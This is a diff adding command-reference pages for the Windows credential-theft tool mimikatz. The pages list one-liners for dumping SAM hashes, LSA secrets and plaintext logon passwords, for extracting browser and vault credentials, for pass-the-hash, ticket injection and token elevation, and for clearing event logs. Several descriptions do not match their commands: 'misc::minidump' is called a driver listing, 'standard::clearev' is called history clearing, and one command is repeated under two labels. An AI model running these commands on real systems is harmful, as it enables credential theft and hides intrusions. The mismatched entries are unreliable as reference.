diff --git a/pages/windows/mimikatz-crypto.md b/pages/windows/mimikatz-crypto.md new file mode 100644 index 0000000000..5f4afe4fdc --- /dev/null +++ b/pages/windows/mimikatz-crypto.md @@ -0,0 +1,16 @@ +# mimikatz crypto + +> Manipulate Windows cryptographic services and certificates. +> More information: . + +- List cryptographic providers: + +`mimikatz "crypto::providers"` + +- List keys in a cryptographic provider: + +`mimikatz "crypto::capi"` + +- Export certificates and keys: + +`mimikatz "crypto::certificates /export"` diff --git a/pages/windows/mimikatz-dpapi.md b/pages/windows/mimikatz-dpapi.md new file mode 100644 index 0000000000..ba29a98ab4 --- /dev/null +++ b/pages/windows/mimikatz-dpapi.md @@ -0,0 +1,16 @@ +# mimikatz dpapi + +> Interact with the Windows Data Protection API (DPAPI). +> More information: . + +- List master keys: + +`mimikatz "dpapi::masterkey /list"` + +- Decrypt a DPAPI blob: + +`mimikatz "dpapi::blob /in:blob_file.bin"` + +- Retrieve Chrome credentials using DPAPI: + +`mimikatz "dpapi::chrome /in:Login Data"` diff --git a/pages/windows/mimikatz-event.md b/pages/windows/mimikatz-event.md new file mode 100644 index 0000000000..a64ab161fd --- /dev/null +++ b/pages/windows/mimikatz-event.md @@ -0,0 +1,12 @@ +# mimikatz event + +> Manage Windows Event Log records. +> More information: . + +- Clear event logs: + +`mimikatz "event::clear"` + +- Display event log sources: + +`mimikatz "event::providers"` diff --git a/pages/windows/mimikatz-kerberos.md b/pages/windows/mimikatz-kerberos.md new file mode 100644 index 0000000000..c60839f9b7 --- /dev/null +++ b/pages/windows/mimikatz-kerberos.md @@ -0,0 +1,16 @@ +# mimikatz kerberos + +> Interact with Kerberos tickets. +> More information: . + +- List current Kerberos tickets: + +`mimikatz "kerberos::list"` + +- Purge all Kerberos tickets: + +`mimikatz "kerberos::purge"` + +- Inject a ticket from a `.kirbi` file: + +`mimikatz "kerberos::ptt ticket.kirbi"` diff --git a/pages/windows/mimikatz-lsadump.md b/pages/windows/mimikatz-lsadump.md new file mode 100644 index 0000000000..eed787edc1 --- /dev/null +++ b/pages/windows/mimikatz-lsadump.md @@ -0,0 +1,17 @@ +# mimikatz lsadump + +> Dump secrets from the Windows Local Security Authority (LSA). +> Requires SYSTEM privileges. +> More information: . + +- Dump SAM hashes: + +`mimikatz "lsadump::sam"` + +- Dump secrets from the SECURITY hive: + +`mimikatz "lsadump::secrets"` + +- Dump cached domain credentials: + +`mimikatz "lsadump::cache"` diff --git a/pages/windows/mimikatz-misc.md b/pages/windows/mimikatz-misc.md new file mode 100644 index 0000000000..e8d1e37990 --- /dev/null +++ b/pages/windows/mimikatz-misc.md @@ -0,0 +1,16 @@ +# mimikatz misc + +> Miscellaneous system and utility commands. +> More information: . + +- Trigger Blue Screen of Death (for testing): + +`mimikatz "misc::bsod"` + +- List loaded kernel drivers: + +`mimikatz "misc::minidump"` + +- Change system time: + +`mimikatz "misc::systemtime"` diff --git a/pages/windows/mimikatz-net.md b/pages/windows/mimikatz-net.md new file mode 100644 index 0000000000..590859f0ff --- /dev/null +++ b/pages/windows/mimikatz-net.md @@ -0,0 +1,16 @@ +# mimikatz net + +> Perform network and domain operations. +> More information: . + +- List domain users: + +`mimikatz "net::users"` + +- List domain computers: + +`mimikatz "net::computers"` + +- Retrieve domain controller information: + +`mimikatz "net::domaincontrollers"` diff --git a/pages/windows/mimikatz-privilege.md b/pages/windows/mimikatz-privilege.md new file mode 100644 index 0000000000..830b4b8d05 --- /dev/null +++ b/pages/windows/mimikatz-privilege.md @@ -0,0 +1,12 @@ +# mimikatz privilege + +> Manage privileges for mimikatz operations. +> More information: . + +- Enable debug privilege (required for many modules): + +`mimikatz "privilege::debug"` + +- Check current privilege state: + +`mimikatz "privilege::whoami"` diff --git a/pages/windows/mimikatz-process.md b/pages/windows/mimikatz-process.md new file mode 100644 index 0000000000..d637b4b52d --- /dev/null +++ b/pages/windows/mimikatz-process.md @@ -0,0 +1,12 @@ +# mimikatz process + +> Manage process privileges and tokens. +> More information: . + +- List processes with their tokens: + +`mimikatz "process::list"` + +- Elevate mimikatz to a SYSTEM process: + +`mimikatz "process::token /user:NT AUTHORITY\SYSTEM"` diff --git a/pages/windows/mimikatz-sekurlsa.md b/pages/windows/mimikatz-sekurlsa.md new file mode 100644 index 0000000000..ab308aa914 --- /dev/null +++ b/pages/windows/mimikatz-sekurlsa.md @@ -0,0 +1,17 @@ +# mimikatz sekurlsa + +> Extract credentials and secrets from memory. +> Requires debug privileges. +> More information: . + +- Extract plaintext passwords: + +`mimikatz "sekurlsa::logonpasswords"` + +- List Kerberos tickets in memory: + +`mimikatz "sekurlsa::tickets"` + +- Dump LSA secrets: + +`mimikatz "sekurlsa::secrets"` diff --git a/pages/windows/mimikatz-service.md b/pages/windows/mimikatz-service.md new file mode 100644 index 0000000000..044d77834c --- /dev/null +++ b/pages/windows/mimikatz-service.md @@ -0,0 +1,16 @@ +# mimikatz service + +> Manage Windows services through mimikatz. +> More information: . + +- Start a service: + +`mimikatz "service::start service_name"` + +- Stop a service: + +`mimikatz "service::stop service_name"` + +- Delete a service: + +`mimikatz "service::delete service_name"` diff --git a/pages/windows/mimikatz-standard.md b/pages/windows/mimikatz-standard.md new file mode 100644 index 0000000000..29d6d5c551 --- /dev/null +++ b/pages/windows/mimikatz-standard.md @@ -0,0 +1,16 @@ +# mimikatz standard + +> Basic commands and mimikatz environment management. +> More information: . + +- Display system information: + +`mimikatz "standard::info"` + +- Clear the mimikatz command history: + +`mimikatz "standard::clearev"` + +- Show command history: + +`mimikatz "standard::history"` diff --git a/pages/windows/mimikatz-token.md b/pages/windows/mimikatz-token.md new file mode 100644 index 0000000000..3d210651e7 --- /dev/null +++ b/pages/windows/mimikatz-token.md @@ -0,0 +1,16 @@ +# mimikatz token + +> List and manipulate security tokens. +> More information: . + +- List tokens: + +`mimikatz "token::list"` + +- Elevate privileges by impersonating a token: + +`mimikatz "token::elevate"` + +- Revert to original token: + +`mimikatz "token::revert"` diff --git a/pages/windows/mimikatz-vault.md b/pages/windows/mimikatz-vault.md new file mode 100644 index 0000000000..07c40107ef --- /dev/null +++ b/pages/windows/mimikatz-vault.md @@ -0,0 +1,12 @@ +# mimikatz vault + +> Extract credentials stored in the Windows Credential Vault. +> More information: . + +- List vault credentials: + +`mimikatz "vault::list"` + +- Dump all vault credentials: + +`mimikatz "vault::cred"` diff --git a/pages/windows/mimikatz.md b/pages/windows/mimikatz.md new file mode 100644 index 0000000000..02a4e61ae3 --- /dev/null +++ b/pages/windows/mimikatz.md @@ -0,0 +1,37 @@ +# mimikatz + +> Interact with Windows credentials, perform credential dumping, token manipulation, and more. +> Requires administrator privileges and typically runs on Windows. +> More information: . + +- Run mimikatz in interactive mode: + +`mimikatz` + +- Enable debug privileges (needed for most operations): + +`mimikatz "privilege::debug"` + +- List available logon sessions: + +`mimikatz "sekurlsa::logonpasswords"` + +- Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory: + +`mimikatz "sekurlsa::logonpasswords"` + +- Pass-the-Hash with a specific NTLM hash and launch a command: + +`mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"` + +- Dump local SAM database hashes: + +`mimikatz "lsadump::sam"` + +- Extract Kerberos tickets and export to a file: + +`mimikatz "kerberos::list /export"` + +- Exit mimikatz: + +`exit`